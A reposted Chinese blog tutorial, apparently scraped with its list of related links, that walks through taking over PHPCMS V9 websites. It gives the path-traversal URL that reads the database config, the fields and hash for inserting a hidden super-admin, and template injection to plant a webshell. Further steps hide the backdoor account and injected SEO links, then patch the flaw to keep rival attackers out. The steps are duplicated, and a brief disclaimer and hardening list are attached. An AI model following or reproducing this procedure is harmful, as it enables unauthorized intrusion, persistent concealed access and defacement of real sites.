【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
来源:互联网 发布:node forever 启动 编辑:程序博客网 时间:2024/06/03 16:31
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。
湛蓝天空
声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试和恶意破坏,以免在您技术水平不足的状况下暴露身份信息进而被追究法律责任。任何团体及个人由此引起的违法行为,湛蓝天空均不负法律连带责任。
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在http://yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞http://skyhome.cn/phpcms/176.html)。
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开http://www.ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在http://yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞http://skyhome.cn/phpcms/176.html)。
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开http://www.ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
- 【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
- phpcms V9最新漏洞利用工具
- Phpcms V9 网站管理系统 SQL 盲注入漏洞
- 入侵网站的各种漏洞的利用
- 入侵网站的各种漏洞的利用
- PHPCMS V9 注射利用
- PHPCMS V9网站平台
- phpcms v9 二次开发详解
- 【phpcms-v9】phpcms-v9中权限的设置
- phpcms v9模版编辑路径穿越漏洞
- PHPCMS V9 WAP模块注入漏洞
- PHPCMS V9 任意文件读取漏洞
- 黑客如何利用文件包含漏洞进行网站入侵
- 入侵网站的各种漏洞的利用和搜索参数
- 【phpcms-v9】phpcms-v9系统搭建wap网站
- 【phpcms-v9】phpcms-v9中模板载入函数template详解
- 利用public权限获取webshell
- 教你如何利用phpcms v9…
- android apk反编译和odex转dex
- templete_trie
- LTTng 简介&使用实战
- oracle 函数 ROWIDTOCHAR(ROWID)
- SVN中创建项目
- 【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
- zigzag数组(蛇形数组)C++实现
- IP网络视频丢包误码恢复技术
- Android Activity的加载模式和onActivityResult方法之间的冲突
- mtk4.0在linux12.04环境下gcc为4.4.7下编译出错
- json数据格式
- shell变量_$#,$@,$0,$1,$2的含义解释
- templete_LIS
- 函数指针奇怪的地方